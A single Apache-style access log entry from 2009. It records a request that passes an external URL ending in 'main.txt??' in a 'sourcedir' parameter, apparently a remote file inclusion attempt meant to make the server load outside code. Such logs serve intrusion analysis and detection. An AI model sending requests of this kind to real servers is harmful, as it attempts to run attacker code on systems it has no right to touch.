213.171.225.234 - - [02/Apr/2009:09:45:01 -0700] "GET /logs/?sourcedir=http://www.astrologiaessencial.com.br/modules/sobreAstrologia/admin/spaw/main.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
